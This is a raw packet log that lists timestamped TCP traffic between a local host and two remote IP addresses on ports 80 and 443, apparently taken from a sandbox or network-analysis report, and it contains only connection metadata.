Oct 8, 2024 20:47:33.154479027 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154495001 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154510021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154526949 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154546022 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154658079 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154663086 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154696941 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154707909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154731035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154745102 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154764891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154778957 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154798985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154809952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154830933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154849052 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154865026 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154875040 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154897928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154913902 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154932022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154947996 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.154963970 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.154982090 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.155013084 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.155013084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.155045986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.155066967 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.155080080 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.155097008 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.155112982 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.155129910 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.155147076 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.155158043 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.155179977 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.155198097 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.155222893 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.155226946 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.155261993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.155303955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.155316114 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.189735889 CEST	443	49832	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.189894915 CEST	443	49832	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.189935923 CEST	443	49832	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.190013885 CEST	49832	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.190090895 CEST	49832	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.190131903 CEST	443	49832	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.190160990 CEST	49832	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.190176964 CEST	443	49832	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.192636013 CEST	49836	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.192724943 CEST	443	49836	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.192826986 CEST	49836	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.192972898 CEST	49836	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.192991972 CEST	443	49836	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.235699892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.235713959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.235723972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.235742092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.235753059 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.235781908 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.235789061 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.235817909 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.235831976 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.235919952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.235953093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.235970020 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.235999107 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.236125946 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.236159086 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.236171961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.236192942 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.236203909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.236228943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.236237049 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.236267090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.236274958 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.236310005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.236316919 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.236350060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.236361027 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.236382961 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.236396074 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.236417055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.236428022 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.236450911 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.236463070 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.236484051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.236494064 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.236531019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.236537933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.236572027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.236583948 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.236604929 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.236615896 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.236638069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.236650944 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.236675024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.236681938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.236718893 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.236783028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.236814976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.236824989 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.236846924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.236860991 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.236876011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.236886024 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.236910105 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.236921072 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.236943960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.236955881 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.236978054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.236984015 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.237011909 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.237021923 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.237045050 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.237056971 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.237081051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.237087965 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.237114906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.237126112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.237150908 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.237160921 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.237194061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.237200022 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.237236023 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.237452984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.237487078 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.237505913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.237520933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.237531900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.237565994 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.237566948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.237610102 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.237871885 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.237925053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.237926960 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.237962008 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.237970114 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.238019943 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.238081932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.238114119 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.238147020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.238164902 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.238181114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.238192081 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.238218069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.238226891 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.238251925 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.238257885 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.238286018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.238296032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.238317966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.238328934 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.238352060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.238363028 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.238394976 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.238605022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.238639116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.238652945 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.238683939 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.239257097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.239310026 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.239342928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.239371061 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.239398003 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.239449978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.239483118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.239511013 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.239523888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.239532948 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.239558935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.239569902 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.239609003 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.239619017 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.239650965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.239664078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.239696980 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.239703894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.239736080 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.239751101 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.239769936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.239784956 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.239803076 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.239814997 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.239839077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.239845991 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.239873886 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.239885092 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.239917994 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.240679979 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.240735054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.240763903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.240818024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.240828037 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.240849972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.240885019 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.240915060 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.240942955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.240951061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.240997076 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241003990 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241035938 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241046906 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241076946 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241089106 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241121054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241137981 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241156101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241166115 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241197109 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241202116 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241242886 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241250038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241282940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241295099 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241328955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241337061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241369009 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241386890 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241403103 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241415024 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241436958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241446972 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241480112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241488934 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241518974 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241535902 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241554976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241569042 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241602898 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241609097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241642952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241653919 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241676092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241688013 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241709948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241722107 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241744995 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241755009 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241791010 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241796970 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241883993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241900921 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241916895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241928101 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241950989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241960049 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.241983891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.241996050 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.242017984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.242028952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.242052078 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.242074966 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.242086887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.242094994 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.242125034 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.242193937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.242227077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.242244959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.242260933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.242271900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.242294073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.242305994 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.242327929 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.242333889 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.242363930 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.242372990 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.242402077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.242407084 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.242435932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.242449045 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.242486954 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.285674095 CEST	443	49833	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.286585093 CEST	49833	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.286597967 CEST	443	49833	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.287087917 CEST	49833	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.287091017 CEST	443	49833	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.296829939 CEST	443	49834	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.297312975 CEST	49834	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.297327042 CEST	443	49834	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.297857046 CEST	49834	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.297861099 CEST	443	49834	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.299802065 CEST	443	49835	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.300226927 CEST	49835	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.300287008 CEST	443	49835	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.300457001 CEST	49835	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:33.300472975 CEST	443	49835	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:33.322480917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.322536945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.322577000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.322612047 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.322654009 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.322654009 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.322670937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.322758913 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.322788000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.322819948 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.322843075 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.322864056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.322942019 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.322993040 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323026896 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323048115 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.323056936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323071957 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.323090076 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323107004 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.323139906 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.323142052 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323173046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323191881 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.323208094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323220968 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.323240995 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323276043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323292971 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.323304892 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323327065 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.323350906 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.323474884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323507071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323527098 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.323540926 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323555946 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.323595047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.323594093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323626041 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323642969 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.323659897 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323677063 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:33.323693037 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:33.323710918 CEST	49755	80	192.168.2.5	95.164.90.97
